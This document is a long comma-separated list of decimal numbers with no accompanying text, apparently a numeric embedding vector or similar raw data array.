-0.03891568258404732, -0.007213990669697523, -0.027346154674887657, 0.021951567381620407, 0.020102478563785553, -0.016438229009509087, -0.01750696823000908, -0.016896259039640427, -0.0021947326604276896, 0.003045058809220791, 0.020543545484542847, -0.013961467891931534, 0.03935674950480461, 0.03347020223736763, 0.007048590108752251, 0.020339975133538246, -0.005517578683793545, 0.00045511542703025043, -0.00500865513458848, 0.03823711723089218, 0.018066784366965294, -0.013723970390856266, -0.006493015680462122, -0.01605653576552868, 0.02459796890616417, 0.053776249289512634, 0.005284322425723076, -0.012086932547390461, 0.022969413548707962, -0.02554795891046524, -0.019559625536203384, -0.024173865094780922, -0.006811092607676983, -0.01514047384262085, -0.04393706098198891, -0.0340130515396595, -0.03211307153105736, -0.00968651007860899, 0.009245443157851696, 0.03630320727825165, 0.0014726973604410887, -0.022053351625800133, -0.001572361565195024, -0.005123163107782602, 0.03521750494837761, -0.028092576190829277, 0.019559625536203384, -0.02152746357023716, -0.00703162606805563, 0.05313161388039589, -0.01654849573969841, -0.03392823413014412, -0.01389361172914505, -0.009270889684557915, 0.018270352855324745, -0.00385297485627234, -0.0011037278454750776, 0.004563347436487675, 0.018473923206329346, -0.008248801343142986, -0.0070570725947618484, -0.04495490714907646, 0.046312037855386734, -0.027651509270071983, 0.01418200135231018, 0.0014165036845952272, -0.017320362851023674, 0.0015373730566352606, 0.016412783414125443, -0.0012659471249207854, -0.009296335279941559, -0.018473923206329346, -0.026396164670586586, 0.014886012300848961, 0.02626045234501362, 0.01866052858531475, 0.007867109030485153, 0.001042763004079461, 0.014928421936929226, 0.031180046498775482, -0.017159203067421913, 0.00475843483582139, 0.046888817101716995, 0.027057765051722527, -0.011442296206951141, -0.004359778016805649, -0.01113694254308939, 0.004495490808039904, 0.007515103556215763, -0.02098461240530014, -0.029839880764484406, 0.001610530773177743, -0.009525351226329803, -0.003386461641639471, 0.007027385290712118, -0.029856843873858452, -0.025870276615023613, 0.04943343624472618, -0.000979147618636489, -0.03715141490101814, 0.0026124739088118076, 0.004983209073543549, -0.03260503336787224, -0.00835906807333231, 0.00044530804734677076, 0.01082310639321804, -0.0026951739564538, 0.014114145189523697, 0.0006266120471991599, -0.008990981616079807, -0.0025509789120405912, -0.004690578207373619, 0.005267357919365168, 0.0024640378542244434, -0.02471671812236309, 0.020543545484542847, -0.004512454848736525, 0.0018172810086980462, 0.03309699147939682, 0.041121017187833786, -0.025327425450086594, -0.030586302280426025, 0.036235351115465164, 0.000002340020955671207, -0.04417455941438675, -0.04590489715337753, -0.030094342306256294, 0.012392287142574787, -0.008638976141810417, -0.03223182260990143, 0.01986498013138771, -0.010220879688858986, 0.020085513591766357, 0.038304973393678665, -0.016913224011659622, 0.030925584957003593, 0.002497966168448329, -0.01568332500755787, -0.007739878259599209, -0.010441413149237633, 0.021578356623649597, 0.033656805753707886, -0.022121207788586617, 0.0194917693734169, -0.0327577069401741, -0.0009033391834236681, 0.0692475214600563, 0.003558223368600011, -0.02244352549314499, -0.013384687714278698, -0.012519517913460732, -0.022121207788586617, 0.012527999468147755, -0.02140871435403824, -0.01816856861114502, -0.027973826974630356, 0.0004927545669488609, 0.026514913886785507, 0.014928421936929226, -0.021764962002635002, -0.002941153710708022, -0.020831935107707977, 0.00568297877907753, -0.014733335003256798, 0.08020634204149246, -0.022426562383770943, 0.018100712448358536, 0.0026082328986376524, 0.0028902613557875156, -0.002765150973573327, 0.029500598087906837, -0.012146307155489922, -0.024089045822620392, -0.00467785494402051, 0.017065901309251785, 0.021849781274795532, -0.010203915648162365, 0.020255153998732567, 0.0101615060120821, -0.005258875899016857, -0.018406067043542862, -0.006446364335715771, -0.019237307831645012, -0.009398120455443859, -0.048212017863988876, 0.0011100893607363105, 0.013223528861999512, -0.017744464799761772, -0.002529773861169815, -0.03140057995915413, 0.01816856861114502, 0.015106545761227608, -0.015021724626421928, 0.019932836294174194, -0.012205681763589382, -0.0032719539012759924, -0.018779275938868523, 0.01271460484713316, -0.01271460484713316, -0.0009097007568925619, -0.02629438042640686, -0.006705067120492458, -0.01782928593456745, 0.022138170897960663, 0.016183767467737198, -0.005398829933255911, 0.02775329351425171, -0.015021724626421928, -0.01568332500755787, -0.014902976341545582, -0.039254963397979736, 0.04268171638250351, 0.014343160204589367, 0.015064135193824768, 0.06042618304491043, -0.020051585510373116, -0.01828731782734394, 0.004792362917214632, 0.016277069225907326, -0.016743583604693413, -0.011628901585936546, -0.01920337975025177, 0.002883899724110961, 0.001637037261389196, -0.030247019603848457, -0.0043364521116018295, 0.004264354705810547, -0.018304280936717987, -0.008511745370924473, -0.010517751798033714, 0.01928820088505745, 0.0012829112820327282, 0.0013603101251646876, 0.00704010808840394, -0.007934965193271637, -0.02023819088935852, 0.0007124929106794298, 0.010500787757337093, -0.02620955929160118, -0.02480153739452362, 0.023410480469465256, 0.018270352855324745, -0.006098599638789892, -0.021120324730873108, -0.020764078944921494, -0.013656113296747208, 0.010746767744421959, 0.016319479793310165, 0.004881424363702536, -0.007604165002703667, 0.0036875747609883547, -0.03596392646431923, -0.0215613916516304, 0.030637193471193314, 0.016370372846722603, -0.012536481954157352, 0.000941508449614048, -0.015971714630723, 0.014029324054718018, 0.014792709611356258, 0.006476051174104214, 0.016582423821091652, 0.02525956928730011, -0.008931607007980347, -0.024954214692115784, -0.0014779986813664436, 0.005933199543505907, -0.00389326480217278, 0.006344579625874758, -0.006204625591635704, -0.001117511186748743, 0.015946269035339355, 0.017727501690387726, 0.02144264243543148, -0.04183351248502731, -0.017201613634824753, 0.00941508449614048, 0.027651509270071983, -0.015810556709766388, -0.01587841287255287, -0.01406325213611126, -0.005878066178411245, 0.0011896087089553475, -0.009262407198548317, -0.008596565574407578, -0.0135797755792737, -0.012332912534475327, -0.010746767744421959, -0.010144541971385479, 0.014097180217504501, -0.005805968772619963, 0.016226178035140038, 0.011484706774353981, -0.0007389993406832218, -0.03243539109826088, 0.02052658051252365, 0.015081099234521389, -0.017057418823242188, -0.005326732527464628, -0.02215513586997986, -0.0015172282001003623, -0.020543545484542847, 0.007621129043400288, -0.032163962721824646, 0.026243487372994423, 0.03891568258404732, -0.025581886991858482, 0.05411553010344505, -0.010169987566769123, 0.0017048936570063233, 0.0037745158188045025, 0.02770240232348442, -0.005157091189175844, 0.022206028923392296, -0.03956031799316406, 0.009287853725254536, -0.00974588468670845, 0.00505106570199132, 0.0331818126142025, -0.011645865626633167, 0.003935675136744976, 0.020475689321756363, 0.0006144191138446331, 0.002417386509478092, -0.042987070977687836, 0.01146774273365736, 0.015810556709766388, -0.0315362922847271, 0.02434350736439228, -0.02480153739452362, 0.02247745357453823, -0.0021427799947559834, -0.008392996154725552, 0.030297912657260895, 0.0018596912268549204, 0.004766916856169701, -0.005937440786510706, 0.010500787757337093, -0.022969413548707962, -0.01184095349162817, 0.0406460240483284, -0.04495490714907646, 0.01601412519812584, 0.007320016156882048, -0.015344043262302876, 0.0070697953924536705, -0.03782998025417328, 0.008405719883739948, 0.01379182655364275, 0.04322456941008568, 0.009601689875125885, 0.0015119268791750073, -0.013876646757125854, -0.019644446671009064, -0.018032856285572052, -0.0344371572136879, 0.01754089631140232, 0.008486298844218254, -0.006310651078820229, -0.02201942354440689, 0.028957746922969818, -0.05187626928091049, -0.018864097073674202, -0.016947152093052864, -0.03521750494837761, -0.01717616803944111, -0.0029347920790314674, 0.02198549546301365, -0.019983729347586632, 0.007252159528434277, 0.033164847642183304, 0.014419498853385448, 0.006980733945965767, 0.015327079221606255, 0.02738008461892605, -0.01791410706937313, 0.023342624306678772, -0.012290501967072487, -0.00974588468670845, 0.0018490887014195323, -0.025904204696416855, 0.04451384022831917, 0.012697640806436539, -0.007667780388146639, -0.020085513591766357, 0.019627481698989868, -0.007990098558366299, -0.006323374342173338, -0.05442088469862938, -0.0026400405913591385, -0.00865169893950224, -0.03745676949620247, -0.044106703251600266, -0.001026859157718718, -0.01808374747633934, -0.00904187373816967, 0.02388547547161579, -0.015522166155278683, -0.021629247814416885, 0.007731396239250898, -0.013155671767890453, -0.015505202114582062, 0.007150374818593264, -0.03184164687991142, -0.010500787757337093, -0.0003983916831202805, -0.033080026507377625, 0.002775753615424037, -0.028007756918668747, 0.0021639850456267595, 0.00904187373816967, 0.026888124644756317, -0.007336980197578669, -0.0302809476852417, 0.000382487807655707, -0.007536308839917183, 0.03630320727825165, -0.004264354705810547, -0.012222645804286003, -0.019169451668858528, -0.00812581181526184, -0.019423913210630417, -0.0022159377112984657, 0.01476726308465004, -0.038847826421260834, 0.006217348854988813, -0.012765497900545597, 0.014377088285982609, -0.00353065668605268, -0.0007739877910353243, 0.00941508449614048, -0.018813205882906914, 0.014656996354460716, -0.0027863560244441032, -0.04196922481060028, -0.015318596735596657, 0.0031362411100417376, -0.01335924118757248, 0.0071546160615980625, 0.020017657428979874, 0.05167269706726074, 0.006255517713725567, 0.009932490065693855, 0.001561758923344314, 0.02666759118437767, 0.002413145499303937, -0.013248974457383156, -0.026650626212358475, 0.008694109506905079, 0.0006456966511905193, -0.0070570725947618484, -0.00435553677380085, -0.013868165202438831, -0.0014430101728066802, -0.005521819926798344, 0.019186414778232574, -0.006840779911726713, -0.0008699410827830434, 0.00234316848218441, -0.018473923206329346, -0.029432741925120354, 0.016989562660455704, 0.01179854292422533, 0.01788017898797989, -0.011925773695111275, 0.00010344135080231354, 0.03068808652460575, -0.019389985129237175, 0.00800706259906292, -0.01978015899658203, -0.044479914009571075, -0.00370241841301322, -0.02015336975455284, -0.034946080297231674, -0.014546729624271393, -0.002417386509478092, 0.021629247814416885, -0.02497117966413498, -0.019983729347586632, 0.027804186567664146, 0.05075663700699806, -0.0015225294046103954, 0.018813205882906914, 0.0012150548864156008, -0.0134779904037714, -0.02732919156551361, 0.01173916831612587, -0.003583669662475586, 0.0002881249238271266, -0.017693573608994484, -0.029313992708921432, -0.01580207422375679, -0.007638093549758196, 0.011187834665179253, 0.02330869622528553, 0.005661773961037397, 0.027481868863105774, -0.018490886315703392, -0.008846786804497242, -0.018066784366965294, -0.015293151140213013, 0.0013041164493188262, -0.02305423468351364, 0.00835482683032751, -0.016650279983878136, -0.021289965137839317, -0.036065712571144104, 0.02919524349272251, 0.000262016081251204, 0.006488774437457323, -0.004026857204735279, -0.01519984845072031, 0.002849971642717719, 0.01596323400735855, -0.037219271063804626, 0.04305492714047432, -0.0014260460156947374, 0.03280860185623169, -0.01145077869296074, -0.02783811464905739, -0.04349599406123161, -0.04542990401387215, -0.014105662703514099, 0.0037681544199585915, -0.008320898748934269, 0.011764614842832088, 0.03935674950480461, 0.010008828714489937, -0.002975081792101264, -0.026989908888936043, 0.016268586739897728, -0.01576814614236355, -0.03769426792860031, -0.005907753482460976, -0.004306764807552099, -0.008672904223203659, 0.02887292578816414, -0.031010404229164124, -0.0002881249238271266, -0.005046824458986521, 0.005670255981385708, -0.018524814397096634, -0.0024195071309804916, 0.004580311477184296, 0.008622012101113796, 0.021018540486693382, 0.01808374747633934, -0.013427098281681538, 0.00935570988804102, 0.02887292578816414, 0.024920286610722542, 0.00983070582151413, 0.0004222474526613951, 0.005224947817623615, 0.0026654868852347136, -0.0061452509835362434, -0.017981963232159615, -0.0010204976424574852, -0.05394589155912399, -0.029602382332086563, 0.013554329052567482, 0.03462376073002815, -0.007960411719977856, -0.028296146541833878, -0.013774862512946129, -0.014716370962560177, -0.009652581997215748, 0.011416850611567497, 0.03362287953495979, 0.004669372923672199, -0.005415793973952532, 0.018100712448358536, 0.011959701776504517, 0.05448874086141586, -0.014953868463635445, -0.0023198428098112345, -0.0029220690485090017, 0.001182186882942915, 0.016200730577111244, 0.009627136401832104, 0.01675206422805786, -0.013291385024785995, -0.035896070301532745, 0.035488929599523544, -0.011934256181120872, -0.04349599406123161, 0.005937440786510706, -0.000903869338799268, 0.006806851830333471, -0.0039059878326952457, 0.011976665817201138, 0.016828402876853943, 0.006191902328282595, -0.0003467041242402047, -0.0000031973384011507733, 0.012901210226118565, -0.009661064483225346, -0.01070435717701912, -0.012282020412385464, -0.00974588468670845, -0.02227388508617878, 0.008965535089373589, -0.03555678948760033, 0.01771053671836853, 0.016819922253489494, -0.04468348249793053, 0.007129170000553131, 0.0032995205838233232, 0.0039568799547851086, -0.001957234926521778, -0.005025619640946388, -0.0284148957580328, -0.013927539810538292, -0.0009674847824499011, -0.007124928757548332, -0.016489120200276375, 0.002748186932876706, 0.013944503851234913, 0.07484567910432816, 0.03218092769384384, -0.029585419222712517, 0.0014801191864535213, -0.001139776548370719, -0.014699406921863556, 0.023987259715795517, 0.005131645128130913, 0.02666759118437767, -0.002177768386900425, 0.01070435717701912, 0.0012606459204107523, -0.023325659334659576, -0.012366840615868568, 0.007396354805678129, -0.01663331687450409, -0.00009184478403767571, -0.012477107346057892, -0.011340511962771416, -0.0060434662736952305, -0.008057955652475357, 0.014792709611356258, 0.023919403553009033, -0.0019879823084920645, 0.00937267392873764, -0.01007668487727642, 0.022206028923392296, -0.01043293159455061, -0.013019959442317486, -0.006132528185844421, -0.019050702452659607, 0.0021162736229598522, -0.01136595755815506, 0.003825408173725009, -0.004487008787691593, -0.020916756242513657, 0.024241723120212555, -0.0035179336555302143, -0.0005139597342349589, -0.015708772465586662, -0.017193131148815155, -0.0019349695648998022, -0.0024025430902838707, -0.0169980451464653, -0.006611764430999756, -0.004141364712268114, 0.036642491817474365, 0.015547612681984901, 0.0015426743775606155, -0.016913224011659622, 0.01179854292422533, -0.032452356070280075, 0.01891499012708664, 0.026684554293751717, -0.005135886371135712, -0.0012012715451419353, -0.003914469853043556, -0.001594626926817, -0.008583842776715755, -0.02393636852502823, -0.0023516507353633642, 0.006310651078820229, 0.027889007702469826, 0.01547127403318882, 0.02178192511200905, 0.0009558219462633133, -0.01725250668823719, 0.015445827506482601, 0.007133410777896643, 0.031383614987134933, 0.003481884952634573, 0.006119804922491312, -0.009211515076458454, 0.005297045223414898, -0.000026208233975921758, 0.030297912657260895, -0.02663366310298443, 0.01341861579567194, -0.014690924435853958, -0.0174221470952034, 0.0025933892466127872, 0.0017207975033670664, -0.013952985405921936, 0.02583634853363037, -0.0319264680147171, 0.003151084529235959, -0.005636327434331179, -0.01422441191971302, 0.01343557983636856, -0.008562637493014336, -0.011976665817201138, -0.0024682788643985987, 0.02497117966413498, 0.014656996354460716, -0.008545673452317715, -0.0019551143050193787, 0.017184650525450706, 0.014623068273067474, -0.013969949446618557, -0.011111496016383171, 0.01716768555343151, 0.011857917532324791, 0.020017657428979874, 0.00284573039971292, -0.006594800390303135, -0.001138716354034841, -0.0055557480081915855, 0.004533660132437944, 0.00937267392873764, -0.022036386653780937, -0.010297218337655067, -0.016480639576911926, 0.004512454848736525, -0.028465786948800087, 0.005878066178411245, -0.02430957928299904, -0.014606104232370853, -0.00014856854977551848, 0.027532760053873062, -0.007582960184663534, -0.021391751244664192, -0.007175821345299482, -0.005865343380719423, -0.03324966877698898, -0.0004214522778056562, 0.011086050420999527, -0.0015702410601079464, -0.014283785596489906, 0.019678374752402306, 0.016862330958247185, 0.011255690827965736, 0.021680140867829323, 0.014054770581424236, 0.0032592308707535267, 0.027142586186528206, -0.015903858467936516, 0.015242258086800575, 0.002171406988054514, 0.01633644476532936, 0.004031097982078791, -0.013274420984089375, 0.025395281612873077, 0.0015967474319040775, 0.03077290765941143, 0.012273537926375866, 0.003146843519061804, 0.0019710182677954435, -0.011501670815050602, 0.013053887523710728, 0.017625717446208, -0.01105212140828371, -0.006433641072362661, 0.03864425793290138, 0.02525956928730011, 0.021256037056446075, 0.006420917809009552, 0.010373556986451149, -0.0013709126506000757, -0.01567484438419342, -0.00320833851583302, 0.006149492226541042, 0.0369139164686203, 0.0002006536815315485, -0.0013772741658613086, 0.008320898748934269, 0.01385120116174221, -0.008278489112854004, -0.030637193471193314, -0.0019551143050193787, -0.01613287441432476, -0.002603991888463497, -0.0017801719950512052, -0.006344579625874758, -0.012511035427451134, 0.024445291608572006, -0.0023028787691146135, -0.01638733595609665, -0.008465094491839409, -0.0068831900134682655, -0.02201942354440689, 0.008180945180356503, 0.018898025155067444, 0.0014112024800851941, 0.006620246451348066, 0.030586302280426025, -0.003925072494894266, -0.011264173313975334, -0.012977548874914646, -0.020509617403149605, 0.018355173990130424, 0.024920286610722542, 0.03155325725674629, -0.027227407321333885, -0.032333604991436005, -0.014665478840470314, -0.001942391274496913, 0.012850318104028702, 0.014105662703514099, -0.008477817289531231, 0.006637210492044687, -0.019067667424678802, 0.008906161412596703, 0.023156018927693367, -0.008486298844218254, 0.014707888476550579, -0.03952639177441597, 0.0007395294378511608, 0.002004946582019329, -0.0031362411100417376, -0.0004529949219431728, -0.01146774273365736, 0.0015744820702821016, 0.012273537926375866, 0.00898249913007021, 0.0057423533871769905, -0.004103195853531361, 0.009890079498291016, -0.02276584319770336, 0.002251986414194107, 0.01994980126619339, -0.014716370962560177, 0.029313992708921432, -0.0027206202503293753, -0.000743240350857377, -0.008494781330227852, -0.0014642153400927782, 0.051197703927755356, -0.01001731026917696, 0.0052546351216733456, -0.0056744967587292194, 0.005140127148479223, 0.0019180054077878594, 0.006832297891378403, -0.0025530995335429907, 0.0025870278477668762, 0.010619536973536015, -0.008634734898805618, -0.005492132622748613, 0.004741470329463482, -0.030467553064227104, -0.006535425782203674, -0.0015129870735108852, -0.0067389952018857, 0.013393170200288296, -0.015564576722681522, -0.00028441401082091033, 0.013707006350159645, 0.04139244556427002, 0.008236078545451164, 0.011281137354671955, -0.005962886847555637, 0.013715487904846668, 0.0067389952018857, -0.0148266376927495, 0.002673968905583024, 0.0230203066021204, 0.0016285551246255636, -0.005394589155912399, 0.02566670812666416, -0.03657463565468788, 0.004132882691919804, -0.0023028787691146135, -0.029297029599547386, -0.005933199543505907, -0.0356585718691349, 0.011060603894293308, 0.007205508183687925, 0.011764614842832088, -0.0021735273767262697, 0.019610518589615822, -0.021849781274795532, 0.023698870092630386, 0.002472519874572754, 0.014427981339395046, -0.010678911581635475, 0.018100712448358536, -0.007035867311060429, -0.012943620793521404, -0.019423913210630417, 0.0006398652913048863, 0.002603991888463497, 0.026803303509950638, -0.0011302342172712088, 0.0027693919837474823, -0.008923125453293324, 0.008880714885890484, -0.006929841358214617, 0.004860219545662403, -0.004868701566010714, -0.014648514799773693, 0.005992574151605368, 0.011416850611567497, -0.006149492226541042, -0.023325659334659576, 0.022206028923392296, -0.004202859941869974, -0.013181118294596672, 0.030297912657260895, -0.00005768462142441422, -0.016319479793310165, 0.03874604031443596, -0.010229362174868584, 0.023834584280848503, 0.013537365011870861, 0.00021867806208319962, 0.021578356623649597, -0.0021109723020344973, -0.0070570725947618484, -0.004788121674209833, 0.027397047728300095, 0.015445827506482601, -0.0248863585293293, -0.009796776808798313, -0.020594436675310135, 0.0032549898605793715, 0.017557861283421516, -0.012527999468147755, 0.00043178978376090527, 0.011170870624482632, -0.02123907394707203, 0.0069849747233092785, 0.00468633696436882, 0.013562810607254505, -0.02193460240960121, 0.0073412214405834675, 0.008291211910545826, 0.0036875747609883547, -0.00032814961741678417, -0.017108311876654625, -0.020933719351887703, 0.032740745693445206, 0.015556094236671925, 0.03056933730840683, 0.010246326215565205, 0.015827519819140434, 0.00013558039790950716, -0.0168029572814703, 0.004559106193482876, -0.035319291055202484, -0.012044522911310196, -0.032163962721824646, 0.01862660050392151, -0.024411363527178764, -0.0021470210049301386, 0.0002814983017742634, 0.006280964240431786, 0.012188717722892761, 0.011204798705875874, -0.007510862313210964, -0.014699406921863556, -0.0020462966058403254, -0.0005857921205461025, -0.013596739619970322, 0.010941854678094387, -0.0017133757937699556, 0.009279371239244938, 0.0201194416731596, -0.000952111033257097, 0.0028181637171655893, 0.004482767544686794, 0.0010618476662784815, 0.015505202114582062, 0.0012129342649132013, -0.027176514267921448, -0.008702591992914677, 0.0061282869428396225, -0.009559279307723045, -0.017778394743800163, -0.0036515260580927134, -0.0016009884420782328, -0.02770240232348442, 0.017625717446208, 0.009338745847344398, 0.006378507707268, -0.003509451635181904, 0.01759178936481476, 0.03416572883725166, -0.0014037806540727615, -0.02824525348842144, 0.0414603017270565, 0.004234667401760817, 0.0015532769029960036, -0.011357476003468037, -0.012019076384603977, -0.03854247182607651, -0.010890962556004524, -0.012892728671431541, 0.019797123968601227, -0.016327962279319763, -0.003556102979928255, 0.014131109230220318, -0.010288736782968044, -0.008609289303421974, 0.00849902257323265, 0.005407311953604221, 0.008253042586147785, 0.004300403408706188, -0.001909523387439549, -0.017116792500019073, 0.008431165479123592, 0.0025976302567869425, 0.018643563613295555, -0.007659298367798328, 0.013342277146875858, 0.034403227269649506, -0.010229362174868584, 0.0016190127935260534, -0.021425679326057434, 0.02385154739022255, 0.0014748178655281663, 0.033538058400154114, -0.006747477222234011, 0.01541189942508936, -0.019423913210630417, -0.01011909544467926, -0.004071387927979231, -0.006692343857139349, -0.015623951330780983, 0.0023474094923585653, 0.010441413149237633, -0.013291385024785995, 0.004775398876518011, -0.002813922706991434, -0.013342277146875858, 0.01592082343995571, -0.013545846566557884, 0.02554795891046524, -0.018100712448358536, -0.012527999468147755, 0.031943429261446, -0.0209506843239069, 0.0315362922847271, 0.012790943495929241, 0.0302809476852417, -0.031213974580168724, -0.031213974580168724, -0.00009303757542511448, -0.0005592856905423105, 0.005415793973952532, 0.006929841358214617, -0.0074387649074196815, -0.006153733003884554, -0.014385570771992207, -0.0009028090862557292, 0.012892728671431541, -0.0050298604182899, 0.0036875747609883547, 0.004327970091253519, -0.00970347411930561, -0.0032761949114501476, 0.036608561873435974, -0.010899445042014122, -0.004957763012498617, -0.002792717656120658, -0.00435553677380085, -0.009550797753036022, 0.014105662703514099, -0.0037130210548639297, -0.00468633696436882, -0.007676262408494949, 0.014673960395157337, -0.005157091189175844, 0.024648860096931458, -0.012867282144725323, 0.007273364812135696, 0.008295453153550625, 0.010560162365436554, -0.016769029200077057, 0.008965535089373589, -0.026803303509950638, 0.028805069625377655, -0.016862330958247185, 0.004822050221264362, -0.019305163994431496, -0.017659645527601242, 0.011145424097776413, -0.010653465054929256, -0.001749424496665597, 0.0024216275196522474, 0.00084502506069839, 0.01383423712104559, 0.01833820901811123, -0.0019233067287132144, 0.014114145189523697, 0.01167979370802641, 0.04777095094323158, 0.003738467115908861, 0.029093459248542786, 0.009016428142786026, 0.0019137643976137042, -0.0036727311089634895, -0.0007893615402281284, -0.007973134517669678, 0.026820268481969833, -0.005275840405374765, 0.018677491694688797, -0.003165928181260824, 0.02654884196817875, 0.018728384748101234, -0.003032335778698325, 0.0035242950543761253, -0.006722031161189079, -0.009669546037912369, -0.009440531022846699, 0.01480967365205288, -0.005538783967494965, -0.009559279307723045, -0.009974900633096695, 0.022579239681363106, -0.022511381655931473, 0.02268102392554283, -0.01642126403748989, -0.0019116438925266266, 0.029856843873858452, 0.007252159528434277, -0.0100597208365798, -0.004745711572468281, -0.005309768486768007, -0.023664942011237144, 0.000652588321827352, 0.02256227470934391, 0.0035052106250077486, 0.007447246927767992, -0.021951567381620407, 0.002739704679697752, -0.0035348976962268353, -0.013817273080348969, 0.018558742478489876, 0.00387205951847136, 0.004580311477184296, 0.01899980939924717, -0.01201059389859438, -0.003653646446764469, -0.013164154253900051, 0.022579239681363106, 0.0021798890084028244, -0.006136768963187933, -0.007608406245708466, 0.0005799607024528086, -0.015165920369327068, -0.0028330073691904545, -0.005538783967494965, 0.0012553445994853973, 0.002673968905583024, 0.0039059878326952457, -0.024038152769207954, 0.002779994625598192, -0.010899445042014122, 0.005305527243763208, 0.011026675812900066, -0.009720439091324806, -0.0025827866047620773, -0.023376552388072014, -0.006323374342173338, -0.0036069953348487616, 0.016031090170145035, 0.01796499826014042, 0.010186951607465744, -0.009796776808798313, 0.006191902328282595, 0.003187133464962244, 0.012511035427451134, 0.020848898217082024, 0.0121293431147933, 0.012536481954157352, 0.003087469143792987, 0.006912877317517996, 0.014792709611356258, 0.012146307155489922, -0.01788017898797989, -0.010008828714489937, 0.0035391387064009905, -0.009033392183482647, 0.0036812131293118, -0.009449012577533722, 0.00037268042797222733, -0.012146307155489922, 0.006132528185844421, 0.024869395419955254, -0.003963241819292307, 0.018931953236460686, -0.0024301097728312016, -0.007536308839917183, 0.0013624306302517653, 0.012782461941242218, -0.006781405303627253, 0.01238380465656519, -0.01945784129202366, -0.018524814397096634, -0.001567060244269669, 0.007133410777896643, -0.0048856656067073345, -0.009907043538987637, -0.024106008931994438, -0.01250255387276411, -0.0024470738135278225, -0.0004275487444829196, -0.00370241841301322, 0.0030047690961509943, 0.01406325213611126, 0.006196143571287394, 0.030705049633979797, -0.016031090170145035, -0.0052885632030665874, -0.026905087754130363, 0.01908463053405285, 0.022409597411751747, -0.000192569219507277, -0.03097647614777088, -0.01167979370802641, 0.009270889684557915, -0.012519517913460732, -0.00024969057994894683, -0.010297218337655067, 0.005199501756578684, 0.021883709356188774, 0.02169710397720337, 0.008855268359184265, -0.03065415844321251, -0.02534439042210579, 0.014266821555793285, 0.029839880764484406, 0.003696056781336665, 0.0026548842433840036, 0.0065820771269500256, -0.010543198324739933, 0.023698870092630386, -0.017277952283620834, 0.020170334726572037, 0.02003462053835392, 0.0115101533010602, -0.002497966168448329, 0.012960584834218025, 0.009287853725254536, -0.000775578198954463, 0.005687220022082329, -0.004419152159243822, 0.013257456943392754, -0.0031150358263403177, 0.0010973663302138448, 0.001305176643654704, -0.0015310115413740277, 0.01646367460489273, 0.010560162365436554, -0.014470390975475311, -0.003954759798943996, -0.009864633902907372, -0.001465275534428656, 0.03148540109395981, -0.005364901851862669, 0.012332912534475327, -0.000307474605506286, 0.0008487359737046063, 0.008312417194247246, -0.008295453153550625, -0.016039572656154633, -0.02023819088935852, -0.014682442881166935, 0.000561936351004988, 0.006302169058471918, 0.01146774273365736, 0.003002648474648595, -0.0013836356811225414, 0.020509617403149605, 0.005810210015624762, 0.010068203322589397, -0.009381156414747238, 0.0005651171086356044, 0.006238553673028946, 0.013011476956307888, -0.004643926862627268, 0.01633644476532936, 0.008838304318487644, 0.003846613457426429, -0.005267357919365168, -0.00877044815570116, 0.001893619541078806, -0.002589148236438632, -0.0223926343023777, 0.007722913753241301, 0.0006674319738522172, 0.005772040691226721, -0.008515986613929272, -0.006675379816442728, -0.024869395419955254, -0.008079160004854202, -0.000371885224012658, 0.0009240141953341663, 0.0012383804423734546, -0.005933199543505907, 0.007099482696503401, -0.003443715628236532, -0.015564576722681522, 0.0028372483793646097, 0.005750835407525301, -0.06816182285547256, -0.003085348755121231, 0.014919940382242203, 0.004945039749145508, 0.004855978302657604, 0.019271235913038254, -0.014656996354460716, -0.017405183985829353, 0.007850144989788532, -0.008036750368773937, 0.01646367460489273, -0.00945749506354332, 0.0017207975033670664, 0.003600633703172207, 0.0029920460656285286, 0.010636501014232635, -0.0076423343271017075, 0.004525178112089634, -0.002648522611707449, -0.018439995124936104, 0.00021297918283380568, -0.009813740849494934, -0.0008084461442194879, 0.025955097749829292, 0.012841835618019104, -0.0033080026041716337, 0.0012977549340575933, -0.0014377088518813252, -0.008189426735043526, -0.023495301604270935, -0.00875348411500454, -0.014886012300848961, -0.00865169893950224, -0.00703162606805563, 0.014563693664968014, 0.030247019603848457, 0.00843964796513319, 0.015793591737747192, -0.01103515736758709, -0.00003306677535874769, 0.008113089017570019, -0.00015638794866390526, -0.030891655012965202, 0.0003639333008322865, -0.007167339324951172, 0.03786390647292137, 0.0005720087792724371, -0.007574478164315224, -0.009890079498291016, -0.016073500737547874, 0.0026082328986376524, 0.005793245509266853, 0.013605221174657345, -0.011230245232582092, 0.017948035150766373, -0.005852620117366314, 0.006552389822900295, 0.004281318746507168, 0.0026548842433840036, 0.006001056171953678, 0.0030641434714198112, -0.002251986414194107, -0.016166802495718002, 0.013783344067633152, 0.008219114504754543, 0.01105212140828371, 0.007807734422385693, 0.011959701776504517, -0.008214873261749744, 0.04084959253668785, 0.013494954444468021, -0.013545846566557884, 0.00708251865580678, -0.016149839386343956, -0.015004760585725307, -0.008863750845193863, 0.012095415033400059, 0.015522166155278683, 0.004260113928467035, 0.01883016899228096, -0.014843601733446121, 0.0037151414435356855, -0.005869584158062935, -0.015793591737747192, 0.031180046498775482, 0.005305527243763208, 0.005483650602400303, 0.014572176150977612, 0.010712839663028717, -0.004855978302657604, 0.005347937811166048, 0.015225294046103954, 0.019101595506072044, 0.009915526024997234, -0.019423913210630417, 0.01408021617680788, 0.0029072253964841366, 0.008554155938327312, 0.00038699389551766217, -0.018728384748101234, -0.025530995801091194, 0.005937440786510706, 0.0004691638459917158, -0.0058441380970180035, 0.00038275288534350693, 0.005916235502809286, 0.0028732973150908947, -0.007956170476973057, 0.005992574151605368, 0.011874881573021412, 0.006802610587328672, -0.005649050697684288, 0.021306930109858513, 0.02318994700908661, 0.013113262131810188, -0.014818155206739902, 0.027939898893237114, -0.00192648742813617, -0.0007358185248449445, 0.01862660050392151, 0.010984265245497227, -0.00270577659830451, -0.004470044746994972, 0.019983729347586632, -0.0019551143050193787, -0.011857917532324791, -0.0039017468225210905, 0.015403417870402336, -0.0034161489456892014, -0.0011896087089553475, 0.004626962821930647, 0.019542662426829338, -0.018439995124936104, 0.016930188983678818, -0.006989215966314077, -0.017473040148615837, 0.0019561746157705784, 0.015148956328630447, -0.017311880365014076, -0.01343557983636856, -0.004508214071393013, -0.019271235913038254, -0.012324430048465729, -0.005958646070212126, 0.03562464565038681, 0.013817273080348969, 0.0005608760984614491, 0.019271235913038254, 0.004864460323005915, -0.004779639653861523, -0.011942737735807896, -0.010594090446829796, -0.017574824392795563, 0.008846786804497242, -0.0010973663302138448, 0.004779639653861523, -0.0006589498952962458, 0.0012935139238834381, 0.0025212918408215046, -0.0017420026706531644, -0.004207100719213486, -0.006391230970621109, -0.018236424773931503, -0.005292804446071386, 